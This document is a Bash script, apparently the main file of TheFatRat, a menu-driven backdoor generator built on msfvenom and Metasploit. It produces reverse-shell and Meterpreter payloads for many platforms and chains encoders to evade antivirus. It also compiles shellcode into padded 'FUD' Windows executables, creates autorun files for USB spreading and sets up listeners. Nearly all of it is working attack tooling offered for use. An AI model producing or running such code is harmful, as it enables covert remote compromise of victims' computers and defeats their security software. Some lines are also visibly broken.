TheFatRat/fatrat

912 lines
34 KiB
Bash

#!/bin/bash
#============================================================================================================
# THEFATRAT
#
# Welcome and dont disclaimer
# fatrat Author By Edo -maland-
# Tested On Kali Linux and Kali sana v.2
# contact me in screetsec@gmail.com
# OS Penetration From Indonesia : http://dracos-linux.org/
# Easy tool for generate backdoor with msfvenom ( part of metasploit framework )
# and program compiles a C program with a meterpreter reverse_tcp payload In it that can then be executed on
# a windows host Program to create a C program after it is compiled that will bypass most AV
#============================================================================================================
#This colour
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
BlueF='\e[1;34m'
#Checking
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
resize -s 30 73
clear
SERVICE=service;
#Check for gcc compiler
which i586-mingw32msvc-gcc >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo ""
COMPILER="i586-mingw32msvc-gcc"
else
which i686-w64-mingw32-gcc
if [ $? -eq 0 ]; then
echo ""
COMPILER="i686-w64-mingw32-gcc"
else
echo ""
echo -e "\e[01;31m[!]\e[00m Unable to find the required gcc program, install i586-mingw32msvc-gcc or i686-w64-mingw32-gcc (Arch) and try again"
echo""
echo "Do you want install mingw tool in the system for fix problem [Y/n]" ;
read bebe
if [ $bebe == "y" ] ;
then
apt-get update
clear
apt-get install mingw32
else
exit
fi
echo ""
exit 1
fi
fi
#########################
#CHECK DEPENDICS
#########################
echo -e $cyan" ____ _ _ _ "
echo " / ___| |__ ___ ___| | _(_)_ __ __ _ "
echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | "
echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ "
echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)"
echo " |___/ "
echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia '
echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- '
echo -e " "
if [ $(id -u) != "0" ]; then
echo [!]::[Check Dependencies]: ;
sleep 2
echo [*]::[Check User]: $USER ;
sleep 1
echo [x]::[not root]: you need to be [root] to run this script.;
echo ""
sleep 1
exit
else
echo [!]::[Check Dependencies]: ;
sleep 1
echo [*]::[Check User]: $USER ;
fi
ping -c 1 google.com > /dev/null 2>&1
if [ "$?" != 0 ]
then
echo [*]::[Internet Connection]: DONE!;
echo [x]::[ warning ]: This Script Needs An Active Internet Connection;
sleep 2
else
echo [*]::[Internet Connection]: connected!;
sleep 2
fi
# check if msfvenom and metasploit installation exists
if [ -d $find ]; then
echo [*]::[msfvenom]: installation found!;
else
Colors;
echo [x]::[warning]:this script require m msfvenom installed to work ;
echo [!]::[please wait]: Downloading from network... ;
sleep 3
fi
sleep 3
clear
##############################
#CHECKING POSTGRESQL
#############################
if ps ax | grep -v grep | grep postgresql > /dev/null
then
clear
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $lightgreen" _ _ "
echo " ___ ___ _ ____ _(_) ___ ___ _ __ _ _ _ __ _ __ (_)_ __ __ _ "
echo " / __|/ _ \ '__\ \ / / |/ __/ _ \ | '__| | | | '_ \| '_ \| | '_ \ / _ |"
echo " \__ \ __/ | \ V /| | (_| __/ | | | |_| | | | | | | | | | | | (_| |"
echo " |___/\___|_| \_/ |_|\___\___| |_| \__ _|_| |_|_| |_|_|_| |_|\__, |"
echo " |___/ "
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
sleep 2
else
clear
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white"::::::::::::::::::::$white "Metasploit service is not running"$white ::::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo ""
echo -e $white " /) "
echo " // "
echo " (( "
echo " // "
echo " .-. // .-. "
echo " / \- ((=-/ \ "
echo " \ \ / "
echo " -( ___ ))__)- "
echo " .-' // '-. "
echo " / (( \ "
echo " | * | "
echo " \ / "
echo " \ |_w_| / "
echo " _) \ / (_ "
echo " jgs (((---' '---))) "
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
echo -e $white":::::::::::::::: Wait for starting a Service Postgresql ::::::::::::::::"
echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::"
service postgresql start
read -p "Press [Enter] key to Continue..."
clear
fi
function cmsfvenom() {
clear
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Create Payload with msfvenom ( must install msfvenom ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo -e $red" ___________ "
echo -e " | |======[*** $yellow ____ _ "
echo -e $red" | $yellow MSFVENOM $red \ $yellow / ___|_ __ ___ ____| |_ ___ _ __ "
echo -e $red" |_____________\_______ $yellow | | | '__/ _ \/ _ | __/ _ \| '__|"
echo -e $red" |==[msf >]============\ $yellow | |___| | | __/ (_| | || (_) | | "
echo -e $red" |______________________\ $yellow \____|_| \___|\____|\__\___/|_| "
echo -e $yellow" \(@)(@)(@)(@)(@)(@)(@)/ "
echo -e $red" ********************* "
echo ""
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo""
echo -e $okegreen " [1] LINUX >> FatRat.ef"
echo -e " [2] WINDOWS >> FatRat.exe"
echo -e " [3] ANDROID >> FatRat.apk"
echo -e " [4] MAC >> FatRat.macho"
echo -e " [5] PHP >> FatRat.php"
echo -e " [6] ASP >> FatRat.asp"
echo -e " [7] JSP >> FatRat.jsp"
echo -e " [8] WAR >> FatRat.war"
echo -e " [9] Python >> FatRat.py "
echo -e " [10] Bash >> FatRat.sh"
echo -e " [11] Perl >> FatRat.pl"
echo -e " [12] Back to Menu "
echo -e " "
echo -n -e $red' \033[4mCreator$FATRAT:\033[0m>> '; tput sgr0 #insert your choice
read fatrat1
if test $fatrat1 == '1'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f elf > FatRat.elf
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '2'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o FatRat.exe
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '3'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > FatRat.apk
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '4'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > FatRat.macho
echo -e "Shell Saved To outputFolder "
elif test $fatrat1 == '5'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p php/meterpreter_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > FatRat.php
cat FatRat.php | pbcopy && echo '<?php ' | tr -d '\n' > FatRat.php && pbpaste >> FatRat.php
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '6'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > FatRat.asp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '7'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > FatRat.jsp
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '8'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > FatRat.war
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '9'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > FatRat.py
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '10'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > FatRat.sh
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '11'
then
cd "output"
echo -e $okegreen""
read -p ' Set LHOST IP: ' yourip; read -p ' Set LPORT: ' yourport
msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > FatRat.pl
echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '12'
then
clear
menu
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) : "
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
cmsfvenom
fi
}
function clisteners() {
clear
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Create Listener with metasploit ( must install metasploit ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo
echo -e $yellow" _ _ _ ^__^ "
echo " | | (_)___ ___| |_ ___ _ __ ___ _ __ ___ (oo)\_______ "
echo " | | | / __|/ _ \ __/ _ \ '_ \ / _ \ '__/ __| (__)\ )\/\ "
echo " | |___| \__ \ __/ || __/ | | | __/ | \__ \ ||----w | "
echo " |_____|_|___/\___|\__\___|_| |_|\___|_| |___/ || || "
echo ""
echo -e $okegreen" ===================================================================== "
echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | "
echo -e $okegreen" ===================================================================== "
echo ""
echo -e $okegreen" [1] Liseners for payload linux"
echo -e " [2] Liseners for payload Windows"
echo -e " [3] Liseners for payload Mac"
echo -e " [4] Liseners for payload Android"
echo -e " [5] Back to Menu "
echo -e " "
echo -n -e $red' \033[4mListeners$fatrat:\033[0m>> '; tput sgr0 #insert your choice
read fatrat1
if test $fatrat1 == '1' #LINUX
then
touch "temp/meterpreter_linux.rc"
echo use exploit/multi/handler > "temp/meterpreter_linux.rc"
echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> "temp/meterpreter_linux.rc"
echo -e $okegreen ""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_linux.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_linux.rc"
echo set ExitOnSession false >> "temp/meterpreter_linux.rc"
echo exploit -j >> "temp/meterpreter_linux.rc"
xterm -e msfconsole -r "temp/meterpreter_linux.rc" &
clear
elif test $fatrat1 == '2' #Windows
then
touch "temp/meterpreter_windows.rc"
echo use exploit/multi/handler > "temp/meterpreter_windows.rc"
echo set PAYLOAD windows/meterpreter/reverse_tcp >> "temp/meterpreter_windows.rc"
echo -e $okegreen ""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_windows.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_windows.rc"
echo set ExitOnSession false >> "temp/meterpreter_windows.rc"
echo exploit -j >> "temp/meterpreter_windows.rc"
xterm -e msfconsole -r "temp/meterpreter_windows.rc" &
clear
elif test $fatrat1 == '3' #Mac
then
touch "temp/meterpreter_mac.rc"
echo use exploit/multi/handler > "temp/meterpreter_mac.rc"
echo set PAYLOAD osx/x86/shell_reverse_tcp >> "temp/meterpreter_mac.rc"
echo -e $okegreen ""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_mac.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_mac.rc"
echo set ExitOnSession false >> "temp/meterpreter_mac.rc"
echo exploit -j >> "temp/meterpreter_mac.rc"
xterm -e msfconsole -r "temp/meterpreter_mac.rc" &
clear
elif test $fatrat1 == '4' #Android
then
touch "temp/meterpreter_android.rc"
echo use exploit/multi/handler > "temp/meterpreter_android.rc"
echo set PAYLOAD android/meterpreter/reverse_tcp >> "temp/meterpreter_android.rc"
echo -e $okegreen ""
read -p ' Set LHOST IP: ' uservar
echo set LHOST $uservar >> "temp/meterpreter_android.rc"
read -p ' Set LPORT: ' uservar
echo set LPORT $uservar >> "temp/meterpreter_android.rc"
echo set ExitOnSession false >> "temp/meterpreter_android.rc"
echo exploit -j >> "temp/meterpreter_android.rc"
xterm -e msfconsole -r "temp/meterpreter_android.rc" &
clear
elif test $fatrat1 == '5'
then
clear
menu
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) : "
read back
if [ $back != 'n' ] && [ $back != 'N' ]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
cmsfvenom
fi
}
########################################### MENU AVOID ############################################################
#
#recoded AVOID ( AV0id - Metapsloit Payload Anti-Virus Evasion ) to next version - Screetsec ( Edo -maland )
#Released as open source by NCC Group Plc - http://www.nccgroup.com/
#Developed or original code by Daniel Compton, daniel dot compton at nccgroup dot com
#Removed Deprecated Commands in favor of MsfVenom by Jason Soto www.jsitech.com
#Credit to other A.V. scripts and research by Astr0baby, Vanish3r & Hasan aka inf0g33k , Screetsec
#
################################################################################################################
function avoid {
clear
# User options
PAYLOAD="windows/meterpreter/reverse_tcp" # The payload to use
MSFVENOM=`which msfvenom` # Path to the msfvenom script
MSFCONSOLE=`which msfconsole` # Path to the msfconsole script
#Checking
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
resize -s 36 73
clear
SERVICE=service;
#Checking Version
VERSION="2.1"
# spinner for Metasploit Generator
spinlong ()
{
bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}
# spinner for random seed generator
spinlong2 ()
{
bar=" 01100111001001001110111001101010101010110101001010111001010101010101010"
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}
clear
#MENU INTI
echo ""
echo -e $cyan"========================================================================"
echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION "
echo -e $cyan"========================================================================"
echo -e $red""
echo " "
echo " ..:::::::::.. "
echo " ..:::aad8888888baa:::.. "
echo " .::::d:?88888888888?::8b::::. "
echo " .:::d8888:?88888888??a888888b:::. "
echo " .:::d8888888a8888888aa8888888888b:::. "
echo " ::::dP::::::::88888888888::::::::Yb:::: "
echo " ::::dP:::::::::Y888888888P:::::::::Yb:::: "
echo " ::::d8:::::::::::Y8888888P:::::::::::8b:::: "
echo " .::::88::::::::::::Y88888P::::::::::::88::::. "
echo " :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P::::: "
echo " :::::::Y88888888888P::|::Y88888888888P::::::: "
echo " ::::::::::::::::888:::|:::888:::::::::::::::: "
echo " :::::::::::::::8888888888888b:::::::::::::: "
echo " :::::::::::::::88888888888888:::::::::::::: "
echo " :::::::::::::d88888888888888::::::::::::: "
echo " ::::::::::::88::88::88:::88:::::::::::: "
echo " ::::::::::88::88::88:::88:::::::::: "
echo " ::::::::88::88::P::::88:::::::: "
echo " ::::::88::88:::::::88:::::: "
echo " ::::::::::::::::::: "
echo " ::::::::: "
echo ""
echo -e -$cyan " REMAKE:$red "Screetsec" $cyan( Edo -maland- ) "
echo -e " OPEN SOURCE : $red "NCC Group Plc" $cyan( http://www.nccgroup.com ) "
echo -e " DEVELOPED : $red Daniel Compton, daniel dot compton at nccgroup dot com "
echo -e $cyan"========================================================================"
echo -e $okegreen" METASPLOIT SHELL A.V. FOR BYPASS AV THIS VERSION $VERSION "
echo -e $cyan"========================================================================"
echo -e $cyan""
# Set Output filename
echo
echo -n -e "TYPE THE DESIRED OUTPUT FILENAME : $okegreen" ;
read OUTPUTNAME
echo ""
echo ""
echo -n -e $cyan"TYPE THE DESIRED LABEL FOR THE AUTORUN FILES : $okegreen" ;
read LABEL
echo ""
#Check for Metasploit
if [[ "$MSFVENOM" != "" || "$MSFCONSOLE" != "" ]]; then
echo ""
else
echo ""
echo -e "\e[01;31m[!]\e[00m Unable to find the required Metasploit program, cant continue. Install and try again"
echo -e "\e[01;31m[!]\e[00m If msfpayload, msfencode and msfcli are not in your PATH, edit this script options"
echo ""
exit 1
fi
# Random Msfencode encoding iterations
#ITER=`seq 5 10 |sort -R |sort -R | head -1`
ITER=`shuf -i 10-20 -n 1`
echo ""
echo -ne $cyan"TYPE YOUR LHOST : $okegreen" ;
read IP
echo ""
echo ""
echo -ne $cyan"TYPE YOUR LPORT : $okegreen" ;
read PORT
echo ""
echo ""
echo ""
echo -e "\e[01;32m[-]\e[00m Generating Metasploit payload, please wait..."
echo ""
spinlong
#Payload creater
$MSFVENOM -p "$PAYLOAD" LHOST="$IP" LPORT="$PORT" EXITFUNC=thread -f raw | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -f raw 2>/dev/null | $MSFVENOM -e x86/jmp_call_additive -i $ITER -a x86 --platform linux -f raw 2>/dev/null | $MSFVENOM -e x86/call4_dword_xor -i $ITER -a x86 --platform win -f raw 2>/dev/null | $MSFVENOM -e x86/shikata_ga_nai -i $ITER -a x86 --platform win -f c > msf.c 2>/dev/null
echo ""
echo ""
# ANOTHER MENU
clear
echo " "
echo -e $cyan"=================================================================="
echo -e $okegreen" __ _ _ __ "
echo " / _|_ _ ___| | ___ _ ___ _ _ _ __ ___ ___| |/ _| "
echo " | |_| | | |/ __| |/ / | | |/ _ \| | | | '__/ __|/ _ \ | |_ "
echo " | _| |_| | (__| <| |_| | (_) | |_| | | \__ \ __/ | _| "
echo " |_| \____|\___|_|\_\\___ |\___/ \____|_| |___/\___|_|_| "
echo " |___/ "
echo -e $cyan"=================================================================="
echo -e $red""
echo -e $okegreen" |||||||||||||| "
echo -e $red" = \ "
echo " = | "
echo " _= ___/ "
echo -e " / _\ ($okegreen"o"$red)\ "
echo " | | \ _ \ "
echo " | |/ (____) "
echo " \__/ / | "
echo " / / ___) "
echo -e " / \ \ _) $okegreen ) "
echo -e $red" \ \ / $okegreen TheFatRat $okegreen ( "
echo -e $red" \/ \ \_________/ |\___________________ $okegreen ) "
echo -e $red" \/ \ / | $okegreen"===="$red _______)__) "
echo -e " \/ \ / __/___ $okegreen"===="$red _/ "
echo -e " \/ \ / ($okegreen"O"$red ____)\\_(_/ "
echo -e " ($okegreen"O"$red _ ____) "
echo -e " ($okegreen"O"$red ____) "
echo ""
echo -e $cyan"================================================================= "
echo ""
echo -e $okegreen""
echo " 1. Normal [ 400K payload ] - [ fast compile ] "
echo ""
echo " 2. Stealth [ 1-2 MB payload ] - [ fast compile ] "
echo ""
echo " 3. Super Stealth - [ 10-20MB payload ] "
echo ""
echo " 4. Insane Stealth - [ 50MB payload ] "
echo ""
echo " 5. Desperate Stealth - [ 100MB payload ] "
echo ""
echo -ne $cyan "TYPE THE NUMBER IF YOU WANT : " ;
read LEVEL
echo ""
if [ "$LEVEL" = "1" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Normal selected, please wait a few seconds"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 100000-500000 -n 1)
elif [ "$LEVEL" = "2" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Stealth selected, please wait a few seconds"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 1000000-5000000 -n 1)
elif [ "$LEVEL" = "3" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Super Stealth selected, please wait a few seconds"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 8000000-12000000 -n 1)
elif [ "$LEVEL" = "4" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Insane Stealth selected, please wait a few minutes"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 40000000-60000000 -n 1)
elif [ "$LEVEL" = "5" ]; then
echo ""
echo -e "\e[01;32m[-]\e[00m Desperate Stealth selected, please wait a few minutes"
echo ""
echo -e "\e[01;32m[-]\e[00m Generating random seed for padding...please wait"
echo ""
spinlong2
SEED=$(shuf -i 100000000-200000000 -n 1)
else
echo -e "\e[01;31m[!]\e[00m You didnt select a option, exiting"
echo ""
exit 1
fi
# build the c file ready for compile
echo ""
echo '#include <stdio.h>' >> build.c
echo 'unsigned char padding[]=' >> build.c
cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c$SEED > random
sed -i 's/$/"/' random
sed -i 's/^/"/' random
cat random >> build.c
echo ';' >> build.c
echo 'char payload[] =' >> build.c
cat msf.c |grep -v "unsigned" >> build.c
echo 'char comment[512] = "";' >> build.c
echo 'int main(int argc, char **argv) {' >> build.c
echo ' (*(void (*)()) payload)();' >> build.c
echo ' return(0);' >> build.c
echo '}' >> build.c
# gcc compile the exploit
ls icons/icon.res >/dev/null 2>&1
if [ $? -eq 0 ]; then
$COMPILER -Wall -mwindows icons/icon.res build.c -o "$OUTPUTNAME"
else
$COMPILER -Wall -mwindows build.c -o "$OUTPUTNAME"
fi
# check if file built correctly
LOCATED=`pwd`
ls "$OUTPUTNAME" >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo ""
echo -e "\e[01;32m[+]\e[00m Your payload has been successfully created and is located here: \e[01;32m"$LOCATED"/"$OUTPUTNAME"\e[00m"
else
echo ""
echo -e "\e[01;31m[!]\e[00m Something went wrong trying to compile the executable, exiting"
echo ""
exit 1
fi
# create autorun files
mkdir autorun >/dev/null 2>&1
cp "$OUTPUTNAME" autorun/ >/dev/null 2>&1
cp icons/autorun.ico autorun/ >/dev/null 2>&1
echo "[autorun]" > autorun/autorun.inf
echo "open="$OUTPUTNAME"" >> autorun/autorun.inf
echo "icon=autorun.ico" >> autorun/autorun.inf
echo "label="$LABEL"" >> autorun/autorun.inf
echo ""
echo -e "\e[01;32m[+]\e[00m I have also created 3 AutoRun files here: \e[01;32m"$LOCATED"/"autorun/"\e[00m - simply copy these files to a CD or USB"
# clean up temp files
rm build.c >/dev/null 2>&1
rm random >/dev/null 2>&1
rm msf.c >/dev/null 2>&1
rm msfhandler.rc
}
#### credits
function credits {
clear
echo -e "
\033[31m##########################################################################\033[m
Credits To
\033[31m##########################################################################\033[m"
echo
echo -e $white "Special thanks to:"
echo
echo -e $red "Offensive Security for the awesome OS"
echo
echo -e $green "http://www.offensive-security.com/"
echo
echo -e $yellow "http://www.kali.org/"
echo
echo -e $cyan "http://www.kitploit.com/"
echo
echo -e $white "http://www.linuxsec.org/"
echo
echo -e $red "Big Thanks to : http://www.github.com/"
echo
}
###################################################################
# MENU FATRAT
###################################################################
menu () {
clear
echo -e $okegreen""
echo -e $okegreen" ____ "
echo -e $okegreen" | | "
echo -e $okegreen" |____| "
echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ "
echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ "
echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| "
echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| "
echo -e $okegreen" J \.|'.\/ \ "
echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] "
echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] "
echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"1.4" $white[$okegreen--$white] "
echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"Xenogenesis" $white[$okegreen--$white] "
echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] "
echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] "
echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] "
echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] "
echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ "
echo
echo -e $white " "
echo -e $white" [$okegreen"1"$white]$okegreen CREATE BACKDOOR WITH MSFVENOM "
echo -e $white" [$okegreen"2"$white]$okegreen CREATE FUD 100% BACKDOOR ( SLOW BUT POWERFULL ) "
echo -e $white" [$okegreen"3"$white]$okegreen CREATE FUD BACKDOOR WITH AVOID 1.2 "
echo -e $white" [$okegreen"4"$white]$okegreen CREATE A LISTENERS "
echo -e $white" [$okegreen"5"$white]$okegreen JUMP TO MSFCONSOLE "
echo -e $white" [$okegreen"6"$white]$okegreen SEARCHSPLOIT "
echo -e $white" [$okegreen"7"$white]$okegreen HELP "
echo -e $white" [$okegreen"8"$white]$okegreen CREDITS "
echo -e " "
echo -n -e $red' \033[4mScreetsec@Fatrat:\033[0m '; tput sgr0 #insert your choice
read fatrat
if test $fatrat == '1'
then
cmsfvenom
elif test $fatrat == '2'
then
chmod +x powerfull.sh
xterm ./powerfull.sh
elif test $fatrat == '3'
then
avoid
elif test $fatrat == '4'
then
clisteners
elif test $fatrat == '5'
then
xterm msfconsole
elif test $fatrat == '6'
then
clear
echo -e "\033[31mWhat do you want to Hack Today?\033[m"
echo -e "\033[31mEnter a search term and hit Enter\033[m"
read searchterm
gnome-terminal --maximize -t "Seachsploit" --working-directory=WORK_DIR -x bash -c "searchsploit $searchterm; echo -e '\e[32m[-] Close this window when done!\e[0m'; bash" 2>/dev/null & sleep 2
menu
elif test $fatrat == '7'
then
firefox https://github.com/Screetsec/TheFatRat/blob/master/README.md
elif test $fatrat == '8'
then
credits
else
echo -e " Incorrect Number"
fi
echo -n -e " Do you want exit? ( Yes / No ) :"
read back
if [ $back != 'n' ] && [ $back != 'N' ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
then
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ]
then
menu
fi
}
###################################################################
# MENU FATRAT
###################################################################
clear
echo -e $okegreen""
echo -e $okegreen" ____ "
echo -e $okegreen" | | "
echo -e $okegreen" |____| "
echo -e $okegreen" _|____|_ $okegreen _____ _ _____ _ _____ _ "
echo -e $okegreen" / $white"ee"\_ $okegreen|_ _| |_ ___| __|___| |_| __ |___| |_ "
echo -e $okegreen" .< __O $okegreen | | | | -_| __| .'| _| -| .'| _| "
echo -e $okegreen" /\ \.-.' \ $okegreen |_| |_|_|___|__| |___|_| |__|__|___|_| "
echo -e $okegreen" J \.|'.\/ \ "
echo -e $okegreen" | |_.|. | | | $white"[$okegreen--$white] $cyan " $white"Backdoor" Creator for Remote Acces $white[$okegreen--$white] "
echo -e $okegreen" \__.' .|-' / $white"[$okegreen--$white] $cyan" Created by: "$red"Edo Maland (Screetsec) $white[$okegreen--$white] "
echo -e $okegreen" L /|o'--'\ $white"[$okegreen--$white] $cyan" Version: $red"1.4" $white[$okegreen--$white] "
echo -e $okegreen" | /\/\/\ \ $white"[$okegreen--$white] $cyan" Codename: $red"Xenogenesis" $white[$okegreen--$white] "
echo -e $okegreen" J / \.__\ $white"[$okegreen--$white] $cyan" Follow me on Github: $red@Screetsec $white[$okegreen--$white] "
echo -e $okegreen" |/ / $white"[$okegreen--$white] $cyan" $white[$okegreen--$white] "
echo -e $okegreen" \ .'\. $white"[$okegreen--$white]$white " SELECT AN OPTION TO BEGIN: $white[$okegreen--$white] "
echo -e $okegreen" ____)_/\_(___\. $white"[$okegreen--$white] ".___________________________________$white[$okegreen--$white] "
echo -e $okegreen" (___._/ \_.___)'$white\_.-----------------------------------------/ "
echo
echo -e $white " "
echo -e $white" [$okegreen"1"$white]$okegreen CREATE BACKDOOR WITH MSFVENOM "
